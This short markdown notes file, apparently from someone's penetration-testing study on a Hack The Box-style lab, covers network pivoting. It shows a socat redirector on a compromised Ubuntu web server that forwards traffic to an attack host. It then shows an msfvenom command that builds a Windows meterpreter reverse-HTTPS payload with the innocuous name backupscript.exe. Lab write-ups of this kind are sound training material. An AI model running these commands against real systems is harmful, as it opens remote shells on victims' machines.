matmarqs/hacking/network/pivot_tunnel_forward.md

 #### Starting Socat Listener

-Socat Redirection with a Reverse Shell

     ubuntu@Webserver:~$ socat TCP4-LISTEN:8080,fork TCP4:10.10.14.18:80

 Socat will listen on localhost on port `8080` and forward all the traffic to port `80` on our attack host (10.10.14.18).
 Once our redirector is configured, we can create a payload that will connect back to our redirector, which is running on our Ubuntu server.
 We will also start a listener on our attack host because as soon as socat receives a connection from a target, it will redirect all the traffic to our attack host's listener, where we would be getting a shell.

 #### Creating the Windows Payload

-Socat Redirection with a Reverse Shell

     matmarqx@htb[/htb]$ msfvenom -p windows/x64/meterpreter/reverse_https LHOST=172.16.5.129 -f exe -o backupscript.exe LPORT=8080